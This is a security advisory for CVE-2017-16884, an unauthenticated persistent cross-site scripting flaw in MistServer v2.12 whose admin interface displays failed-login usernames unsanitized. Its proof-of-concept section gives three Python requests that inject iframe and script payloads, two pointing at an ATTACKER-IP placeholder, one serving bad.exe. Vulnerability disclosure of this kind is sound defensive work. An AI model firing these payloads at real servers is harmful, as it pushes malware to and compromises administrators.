94 lines
No EOL
2.6 KiB
Text
94 lines
No EOL
2.6 KiB
Text
[+] Credits: John Page (aka Hyp3rlinX)
|
|
[+] Website: hyp3rlinx.altervista.org
|
|
[+] Source: http://hyp3rlinx.altervista.org/advisories/MIST-SERVER-v2.12-UNAUTHENTICATED-PERSISTENT-XSS-CVE-2017-16884.txt
|
|
[+] ISR: ApparitionSec
|
|
|
|
|
|
|
|
Vendor:
|
|
=============
|
|
mistserver.org
|
|
|
|
|
|
|
|
Product:
|
|
===========
|
|
MistServer v2.12
|
|
|
|
|
|
MistServer is a full-featured, next-generation streaming media toolkit for OTT (internet streaming).
|
|
|
|
|
|
|
|
Vulnerability Type:
|
|
===================
|
|
Unauthenticated Persistent XSS
|
|
|
|
|
|
|
|
CVE Reference:
|
|
==============
|
|
CVE-2017-16884
|
|
|
|
|
|
|
|
Security Issue:
|
|
================
|
|
Unauthenticated remote attackers can inject persistent XSS payloads by making failed HTTP authentication requests. Attacker supplied payloads will
|
|
get stored in the server logs as failed authentication requests alerts. Mistserver echoes back the unsanitized payloads in Mist Servers Web interface
|
|
automatically due to automatic refresh of the UI every few seconds, thereby, executing arbitrary attacker supplied code.
|
|
|
|
|
|
|
|
References:
|
|
============
|
|
https://news.mistserver.org/news/78/Stable+release+2.13+now+available%21
|
|
|
|
|
|
|
|
Exploit/POC:
|
|
=============
|
|
import requests
|
|
|
|
#INJECT IFRAME
|
|
requests.get('http://VICTIM-IP:4242/admin/api?callback=&command={"authorize":{"password":"666","username":"<iframe src=\'http://ATTACKER-IP\'></iframe>"}}')
|
|
|
|
#PUSH MALWARE
|
|
requests.get('http://VICTIM-IP:4242/admin/api?callback=&command={"authorize":{"password":"666","username":"<iframe src=\'http://ATTACKER-IP/bad.exe\'></iframe>"}}')
|
|
|
|
#EXFIL LOGS
|
|
requests.get('http://VICTIM-IP:4242/admin/api?command={"authorize":{"password":"666","username":"<script>alert(document.body.innerHTML)</script>"}}')
|
|
|
|
|
|
|
|
Network Access:
|
|
===============
|
|
Remote
|
|
|
|
|
|
|
|
|
|
Severity:
|
|
=========
|
|
High
|
|
|
|
|
|
|
|
Disclosure Timeline:
|
|
=============================
|
|
Vendor Notification: October 19, 2017
|
|
Vendor Acknowledgement : October 20, 2017
|
|
Vendor Released Fix : November 30, 2017
|
|
December 1, 2017 : Public Disclosure
|
|
|
|
|
|
|
|
[+] Disclaimer
|
|
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
|
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
|
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
|
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
|
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
|
or exploits by the author or elsewhere. All content (c).
|
|
|
|
hyp3rlinx |